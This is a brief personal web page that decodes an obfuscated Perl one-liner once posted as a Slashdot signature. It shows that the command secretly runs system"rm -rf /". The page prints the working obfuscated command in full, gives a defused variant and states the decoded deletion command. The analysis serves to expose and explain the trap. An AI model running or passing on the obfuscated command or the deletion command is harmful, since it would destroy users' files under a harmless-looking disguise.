Darsey Litzenberger
(formerly: Dwayne Litzenberger)
In a comment on Slashdot, there was a malicious "perl -e" signature, as follows (without the leading "#" character):
#perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
The malicious script executes the perl code: system"rm -rf /"
I tried to post an analysis of the sig on Slashdot, but the "lameness filter" caused my message to be refused:
Lameness filter encountered. Post aborted!
Reason: Please use fewer 'junk' characters.
So, I posted the analysis here:
$? # Evaluates to 0
? # beginning of the "?:" ternary operator
s:;s:s;;$?: # this code is never executed
: # the ":" in the "?:" ternary operator
### everything above this comment can be deleted
### with no change in the behaviour of the script
s;;=]=>%-{<-|}<&|`{;; # equivalent to: ($_ = '=]=>%-{<-|}<&|`{');
y; -/:-@[-`{-};`-{/" -;; # equivalent to: tr| -/:-@[-`{-}|`-{/" -|;
print "$_\n"; # added by me
#s;;$_;see # equivalent to eval($_); (commented out by me)
In short form, (with arbitrary strings underlined, variables boldfaced, and irrelevent code marked deleted):
#perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Now, if we remove the irrelevant code, and replace the eval($_)-equivalent with print "$_\n", as described above, we get a harmless script that merely outputs the perl code that would be executed by the original script:
#perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"'
That code is, of course:
system"rm -rf /"
There you have it.